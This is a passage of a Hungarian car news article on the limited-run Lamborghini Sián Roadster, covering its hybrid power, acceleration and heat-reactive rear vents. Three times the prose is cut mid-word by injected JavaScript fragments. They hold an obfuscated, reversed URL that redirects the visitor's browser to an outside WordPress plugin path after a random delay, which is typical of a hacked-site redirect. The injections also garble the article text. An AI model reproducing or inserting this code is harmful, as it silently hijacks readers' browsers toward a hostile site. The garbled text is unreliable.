Mindössze tizenkilenc darabot gyártanak a Lamborghini Sián Roadsterből, de ne izgulj rá: az utoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolsó szálig előre elkelt a különleges széria. A Lamborghini fennállásának legerősebb hajtásláncával, a 819 lóerős benzin-elektromos egységgel szerelt roadster minden egyes lóerejének mindössze 2 kilogrammot kell mozgatnia. A nyitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tott autó így 2,9 másodperc alatt gyorsul 100 km/órára, végsebessége pedig meghaladja a 350 km/órát. A felülnézetből (valamint hátsó lámpáiban) a Countach-ot idéző autó felületét úgy optimalizálták, hogy a nyitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tott tető nem befolyásolja aerodinamikai jellemzőit. A hátsó aktív hűtőrostélyok különleges vezérlést kaptak: hőre reagáló intelligens anyagból készültek, így a kipufogóból áradó meleg hatására elfordulnak és megnyitják a szellőzés útját. A légcserének…
- Hirdetés -